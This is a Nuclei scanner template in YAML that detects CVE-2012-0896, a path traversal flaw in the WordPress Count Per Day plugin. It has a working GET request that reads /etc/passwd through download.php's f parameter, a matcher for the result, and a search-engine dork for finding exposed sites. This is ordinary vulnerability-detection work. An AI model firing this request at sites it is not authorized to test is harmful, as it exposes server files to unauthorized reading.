47 lines
2.0 KiB
YAML
47 lines
2.0 KiB
YAML
id: CVE-2012-0896
|
|
|
|
info:
|
|
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
|
|
author: daffainfo
|
|
severity: medium
|
|
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
|
|
remediation: |
|
|
Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/108631/
|
|
- http://plugins.trac.wordpress.org/changeset/488883/count-per-day
|
|
- https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
|
|
- http://wordpress.org/extend/plugins/count-per-day/changelog/
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2012-0896
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01844
|
|
epss-percentile: 0.883
|
|
cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: count_per_day_project
|
|
product: count_per_day
|
|
google-query: inurl:"/wp-content/plugins/count-per-day"
|
|
tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206799f52e48485817e413edc30bd4f359218ec597770780417e46ddcd8b00e00602207a128007973d0e474c073c18ad434eb21153116741ec63ad256b3e003bae78cd:922c64590222798bb761d5b6d8e72950 |